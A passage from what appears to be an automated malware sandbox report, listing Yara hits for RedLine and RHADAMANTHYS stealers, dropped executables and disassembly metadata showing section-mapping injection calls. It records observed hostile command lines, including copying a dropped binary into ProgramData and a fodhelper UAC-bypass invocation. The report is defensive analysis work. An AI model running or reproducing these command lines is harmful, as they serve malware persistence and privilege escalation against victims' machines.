Stealer, Source: 00000022.00000003.2605031090.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2577695503.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2673068563.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2594779782.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2731190444.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2722127729.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2644959111.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2608660423.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2726975550.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2206636387.00000162B0C70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2562339585.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000022.00000003.2232045068.00000162B33C0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2598333639.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2607875870.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2632610681.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2700525376.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2730383751.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2563346057.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2576231333.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2712495323.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2712931577.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2736607710.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2643465060.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2744176853.00000162B3938000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	18:12:52
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\CFAA.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\CFAA.exe
Imagebase:	0x2f0000
File size:	3'974'656 bytes
MD5 hash:	460167998760122937411C5191649DBA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000002.2865187814.0000000003443000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000023.00000002.2865187814.0000000003443000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	18:12:56
Start date:	27/12/2023
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\net.exe" helpmsg 23
Imagebase:	0xd60000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	18:12:56
Start date:	27/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	18:12:56
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\F38F.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\F38F.exe
Imagebase:	0x5e0000
File size:	3'632'640 bytes
MD5 hash:	9C815131562310CCECBBE81C49E57029
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	18:12:57
Start date:	27/12/2023
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 helpmsg 23
Imagebase:	0xe50000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	18:13:07
Start date:	27/12/2023
Path:	C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe" -i
Imagebase:	0x400000
File size:	273'342'460 bytes
MD5 hash:	A8F6256F7E6C68B81633AE38A46013CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	18:13:06
Start date:	27/12/2023
Path:	C:\Users\user\AppData\Local\Temp\33A6.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\33A6.exe
Imagebase:	0x790000
File size:	307'200 bytes
MD5 hash:	246EB9F40EF75F048C065DE2F8903289
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000029.00000000.2368989273.0000000000792000.00000002.00000001.01000000.00000023.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000029.00000002.2775428464.0000000002B14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000029.00000002.2775428464.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000029.00000002.2775428464.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\33A6.exe, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	18:13:07
Start date:	27/12/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c copy "C:\Users\user\AppData\Local\Temp\F38F.exe" "C:\ProgramData\xQfUeydaBrjuHptx.exe" && ping 1.1.1.1
Imagebase:	0x7ff74b280000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	18:13:07
Start date:	27/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	18:13:08
Start date:	27/12/2023
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping 1.1.1.1
Imagebase:	0x7ff6da840000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	18:13:12
Start date:	27/12/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Sysnative\cmd.exe /C fodhelper
Imagebase:	0x7ff74b280000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	18:13:13
Start date:	27/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	52.2%
Total number of Nodes:	46
Total number of Limit Nodes:	1

Executed Functions

Function 00401493 Relevance: 10.7, APIs: 7, Instructions: 204
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015BE
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004015FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401630
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401652

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: fa5345047790d33a398048a29c5d42eabc505595b37e4c32f1a0495e4e03cf99
Instruction ID: 97292508dcf634c7f77ce0fe078d71124df21418c1baf26c2829698e64684dd7
Opcode Fuzzy Hash: fa5345047790d33a398048a29c5d42eabc505595b37e4c32f1a0495e4e03cf99
Instruction Fuzzy Hash: 39615171900205FBEB209F91DC49FAF7BB8EF85B10F10412AFA12BA1E5D6749941DB25

Uniqueness

Uniqueness Score: -1.00%

Function 0040149E Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015BE
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004015FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401630
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401652

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 63bece36550bc1331b6915176a664c657e1e10d2ec8c82d0c2f52fcf667a0543
Instruction ID: 966aceaf6843322aaccc203d9c5cd55170961763a31915afcbcb3c6e7dd630e5
Opcode Fuzzy Hash: 63bece36550bc1331b6915176a664c657e1e10d2ec8c82d0c2f52fcf667a0543
Instruction Fuzzy Hash: 83510A75900245BFEF209F91CC48FEB7BB8EF85B10F10416AFA11BA2E5D6749945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004014AC Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015BE
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004015FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401630
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401652

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 4517f5bade8579ec3562c126fe2d8fca570a5e2e5de3e7acffd78397ea5bb544
Instruction ID: 76b8e04a759d635bde0efe3c3983064c98387ffe1d6c547643d5c02108251d06
Opcode Fuzzy Hash: 4517f5bade8579ec3562c126fe2d8fca570a5e2e5de3e7acffd78397ea5bb544
Instruction Fuzzy Hash: CF510975900249BBEF209F91CC49FEF7BB8EF85B10F10416AFA11BA2E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004014B3 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015BE
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004015FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401630
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401652

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: d1bab02551b93d73db83f338fcd0757f78e8a95fa82f599980ae672ad00f2496
Instruction ID: dc1227ed93abd593f083f9cf7ba07a972f31fc616183e9663e86c653d40fb5c3
Opcode Fuzzy Hash: d1bab02551b93d73db83f338fcd0757f78e8a95fa82f599980ae672ad00f2496
Instruction Fuzzy Hash: 91511975900249BFEF209F91CC48FEF7BB8EF85B10F10416AFA11AA2E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004014C3 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015BE
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004015FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401630
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401652

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 99de84721c1d5f739b751f97031608123db924807c19c43dcdcd78b4bf064aad
Instruction ID: 23080856c1b7ff76fb04a4e89a501db6190a83b13ac99aa6861e550084c1ef18
Opcode Fuzzy Hash: 99de84721c1d5f739b751f97031608123db924807c19c43dcdcd78b4bf064aad
Instruction Fuzzy Hash: 5C511875900209BFEF209F91CC48FAFBBB8EF85B10F104169FA11AA2A5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004014C8 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015BE
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004015FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401630
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401652

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: f30cc7ee10ba587486875aa956bd947390dae3476bc7c318e70837a016550c2e
Instruction ID: 7e274efce38c54d7660d321cc7e05eb7500457083a3d046f50bbb1a39b4d674f
Opcode Fuzzy Hash: f30cc7ee10ba587486875aa956bd947390dae3476bc7c318e70837a016550c2e
Instruction Fuzzy Hash: 2F510975900209BFEF209F91CC49FAFBBB8EF85B10F104169FA11AA2A5D7749945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401872 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018C2

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
Part of subcall function 00401493: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: d96207d25880d39b0535d0ac00c43109124b90c8a49a1ec25fe0217fe993de35
Instruction ID: 2fc6e1649e40d7d8aa515f875939d9c48bb5623c82f9f1960f81a07532c55d1a
Opcode Fuzzy Hash: d96207d25880d39b0535d0ac00c43109124b90c8a49a1ec25fe0217fe993de35
Instruction Fuzzy Hash: E4117C7660C204E7E6007A909D91E7E3229AB44754F308537BA03790F1D67D9B53B66B

Uniqueness

Uniqueness Score: -1.00%

Function 0040187D Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018C2

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
Part of subcall function 00401493: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 774ac771efc0f2d9642077cc683a2e1254ed462c56384d9adfa96cda85c63677
Instruction ID: a27831e20be30d828ac93e77088343585596c83213a5c0d836373b225eadf0df
Opcode Fuzzy Hash: 774ac771efc0f2d9642077cc683a2e1254ed462c56384d9adfa96cda85c63677
Instruction Fuzzy Hash: C401807760C245EBEB016A909D91AAD3725AB45710F308837BA03B90F1D57D8B53B72B

Uniqueness

Uniqueness Score: -1.00%

Function 0040189F Relevance: 1.3, APIs: 1, Instructions: 51
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018C2

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
Part of subcall function 00401493: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 4b9f825c47b675a723ce52a54777ede7b14526d047448b453c0c6d0e4b5600a6
Instruction ID: 5d3ebebc4721d7029c6b9e1b1a0460a5cdc30c2c30bb337782c290de33ebfc12
Opcode Fuzzy Hash: 4b9f825c47b675a723ce52a54777ede7b14526d047448b453c0c6d0e4b5600a6
Instruction Fuzzy Hash: 60012C7720C205EAEB016A90DD91A7D3225AB44714F348537BA03790F1D67D8753B62B

Uniqueness

Uniqueness Score: -1.00%

Function 004018A6 Relevance: 1.3, APIs: 1, Instructions: 46
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018C2

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401550
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157D
Part of subcall function 00401493: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A0

Memory Dump Source

Source File: 00000000.00000002.1676446857.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1676432435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676461515.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676475835.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uVQLD8YVk6.jbxd

